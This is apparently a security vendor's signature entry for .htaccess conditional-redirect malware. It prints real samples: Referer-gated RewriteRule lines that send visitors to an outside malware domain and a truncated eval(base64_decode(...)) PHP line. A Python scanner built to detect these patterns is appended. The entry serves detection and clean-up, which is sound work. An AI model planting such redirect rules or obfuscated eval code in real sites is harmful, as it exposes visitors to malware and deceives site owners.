Description:
This attack modifies the .htaccess file to redirect visitors to a site serving malware (or spam). In some cases, index.php is also modified to perform the redirection.
Loads malware from: multiple domains (one appears in the redirect rule under Malware samples).
Affecting: Any type of web site (no specific target).
Clean up and details: Remove offending code from .htaccess and/or index.php or contact support@sucuri.net for help.
Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware samples:
..
RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteRule .* http://fgnfdfthrv.bee.pl/?q= [R,L]
eval (base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIV..
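
Detection example (added here, not part of the original write-up): a small scanner for the two patterns shown in the samples above, a RewriteRule that sends Referer-matched visitors to an absolute URL, and eval(base64_decode(...)) in PHP. The function names, the redirect.example host and both sample inputs are constructed for illustration.

```python
import re

# Referer-gated condition, e.g. RewriteCond %{HTTP_REFERER} .yahoo. [NC]
COND_RE = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
# Any RewriteRule; group 1 is the host when the substitution is an absolute URL
RULE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+(?:https?://([^\s/?:]+))?', re.I)
EVAL_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(', re.I)

def scan_htaccess(text):
    """Return (line_no, host, referer_patterns) for each RewriteRule that
    sends Referer-matched visitors to an absolute URL."""
    findings, conds = [], []
    for no, line in enumerate(text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            conds.append(cond.group(1))
            continue
        rule = RULE_RE.match(line)
        if rule:
            if conds and rule.group(1):
                findings.append((no, rule.group(1).lower(), conds))
            conds = []  # RewriteCond lines apply only to the next RewriteRule
    return findings

def scan_php(text):
    """Return line numbers containing eval(base64_decode(...))."""
    return [no for no, line in enumerate(text.splitlines(), 1)
            if EVAL_RE.search(line)]

# Constructed sample inputs (not taken from a real infected site)
SAMPLE_HTACCESS = """\
# constructed sample
RewriteEngine On
RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo. [NC]
RewriteRule .* http://redirect.example/?q= [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""
SAMPLE_PHP = '<?php\neval (base64_decode("ZWNobyAxOw=="));\n'

if __name__ == "__main__":
    for hit in scan_htaccess(SAMPLE_HTACCESS):
        print("htaccess line %d: Referer-gated redirect to %s %s" % hit)
    for no in scan_php(SAMPLE_PHP):
        print("php line %d: eval(base64_decode(...))" % no)
```

Hits are triage leads rather than verdicts: hotlink-protection rules also key on the Referer header, so review each flagged rule before removing it.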